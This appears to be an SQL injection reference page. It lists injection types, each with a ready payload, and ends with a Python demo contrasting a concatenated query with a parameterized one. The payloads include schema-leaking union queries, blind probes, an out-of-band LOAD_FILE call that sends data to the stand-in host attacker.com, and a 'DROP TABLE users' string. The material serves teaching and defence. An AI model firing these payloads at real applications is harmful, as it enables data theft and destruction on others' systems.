SQL Injection (SQLi)

  1. Classic (In-Band) — Results appear directly in app response

    1. Error-based — Exploits DB errors to extract data

      • Triggers a conversion error, leaking table names.
      ' OR 1=CONVERT(0, (SELECT table_name FROM information_schema.tables LIMIT 1)) -- -
    2. Union-based — Uses UNION to combine results from injected queries with legitimate ones

      • Appends query results to the original output.
      ' UNION SELECT 1, table_name, 3 FROM information_schema.tables WHERE table_schema = database() -- -
  2. Blind — No direct data in the response; results are inferred

    1. Boolean-based — Relies on true/false conditions

      • Checks if the first character of the MySQL version is '5' (true/false response).
      ' AND (SELECT SUBSTRING(@@version,1,1)) = '5' -- -
    2. Time-based — Uses delays to confirm vulnerabilities

      • Delays response by 5 seconds if the condition is true.
      ' AND IF(1=1, SLEEP(5), 0) -- -
  3. Out-of-band — Relies on external network calls to exfiltrate data; requires DBMS support for outbound requests.

    • Forces the database to make a DNS or HTTP request to an attacker-controlled server, leaking data (e.g., MySQL version) in the request.
    ' + (SELECT LOAD_FILE(CONCAT('\\\\', @@version, '.attacker.com\\share\\'))) -- -
  4. Second-order — Malicious input is stored and executed later

    • The payload is first stored, e.g. in a comment field:
    '; DROP TABLE users; -- -
    • It executes when the stored comment is later used to build another query:
    INSERT INTO comments (user, text) VALUES ('hacker', 'Legit comment'); DROP TABLE users; -- -');
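The union-based and boolean-based payloads above, run against a concatenated query and its parameterized form. This is an added example, not code from the original page: it uses Python's sqlite3 module with a constructed in-memory users table, and swaps the page's MySQL-specific `information_schema` and `@@version` for SQLite's `sqlite_master` and `sqlite_version()`.

```python
import sqlite3

# Constructed in-memory database standing in for the application's backend.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
conn.execute("INSERT INTO users (name, role) VALUES ('alice', 'admin'), ('bob', 'user')")
conn.commit()


def find_user_vulnerable(name: str) -> list:
    """Vulnerable lookup: the input is concatenated into the SQL text, so a
    quote in the input closes the literal and the remainder runs as SQL."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def find_user_safe(name: str) -> list:
    """Hardened lookup: the SQL text is constant and the driver binds the
    value separately, so the entire input is compared as one string."""
    sql = "SELECT name, role FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Union-based (in-band): the page's payload with MySQL's information_schema
# swapped for SQLite's sqlite_master, which exposes the schema in two columns.
UNION_PAYLOAD = "' UNION SELECT name, sql FROM sqlite_master -- -"

# Boolean-based (blind): the page's version probe with @@version swapped for
# sqlite_version(). The true guess keeps alice's row; the false guess drops it.
BOOLEAN_TRUE = "alice' AND substr(sqlite_version(), 1, 1) = '3' -- -"
BOOLEAN_FALSE = "alice' AND substr(sqlite_version(), 1, 1) = '9' -- -"


def compare(payload: str) -> dict:
    """Run one input through both lookups so the difference is visible:
    the vulnerable path leaks schema or flips on the guess, the safe path
    returns no rows because no user is literally named that string."""
    return {"vulnerable": find_user_vulnerable(payload),
            "safe": find_user_safe(payload)}


if __name__ == "__main__":
    for label, payload in [("union", UNION_PAYLOAD),
                           ("boolean true", BOOLEAN_TRUE),
                           ("boolean false", BOOLEAN_FALSE)]:
        print(label, compare(payload))
```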